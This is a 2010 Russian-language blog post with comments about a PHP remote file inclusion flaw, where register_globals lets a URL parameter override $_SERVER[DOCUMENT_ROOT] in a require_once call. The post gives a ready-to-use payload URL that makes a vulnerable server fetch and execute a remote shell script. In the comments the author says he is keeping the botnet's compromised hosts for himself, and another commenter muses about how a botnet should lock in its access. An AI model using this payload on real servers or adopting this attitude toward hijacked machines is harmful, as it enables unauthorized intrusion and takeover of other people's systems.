| /?_SERVER... |
[Jan. 9th, 2010|09:09 pm] |
В коде одного популярного сервиса есть такое:
require_once($_SERVER[DOCUMENT_ROOT]."somepath");
что в сочетании с register_globals даёт феерический эффект.
пишем в строке броузера:
vulnerable-host.com/?_SERVER[DOCUMENT_ROOT]=http://ourhost.com/shell.txt?
сам попался Ж%-) пришлось чистить машину. Ж-))) |
|
|
| Comments: |
| From: | (Anonymous) |
|---|
| Date: | January 10th, 2010 - 02:01 am |
|---|
| | | (Link) |
|
ни нада пользавать php по своей воле
![[User Picture]](http://lj.rossia.org/userpic/191927/26445) | | From: | ![[info]](http://lj.rossia.org/img/userinfo.gif) herm1t |
|---|
| Date: | January 10th, 2010 - 11:30 am |
|---|
| | | (Link) |
|
от чего же? просто внимательнее нужно быть, хотя сам язык способствует производству говнокода - это да.
![[User Picture]](http://lj.rossia.org/userpic/197531/22349) | | From: | ketmar |
|---|
| Date: | January 10th, 2010 - 08:23 pm |
|---|
| | | (Link) |
|
а зачем register_globals-то? O_O
или так, по забывчивости осталось? %-)
| | From: | herm1t |
|---|
| Date: | January 10th, 2010 - 08:33 pm |
|---|
| | | (Link) |
|
некоторые скриптики были написаны на скорую руку фиг знает сколько лет назад, и прижились ))) глобалс не мешал, потому что в коде не было кусков вроде вышепроцитированного, а тут тупо вставил код сервиса и попал на ужин к ботнету ))) зато сейчас иду по его следам, сношу кусочки бота, а хосты оставляю себе )))
| | From: | ketmar |
|---|
| Date: | January 10th, 2010 - 08:35 pm |
|---|
| | | (Link) |
|
совсем разучились люди ботнеты писать. правильный ботнет должен был за собой дырки закрыть, вход забронировать. %-)
| | From: | herm1t |
|---|
| Date: | January 10th, 2010 - 08:40 pm |
|---|
| | | (Link) |
|
да, там такое уебище индонезийское все это писало - понадергало говноскриптов и кое-как связало между собой. говнище всякое за собой тащит и даже прятаться не пытается. однако, работает. )) | |
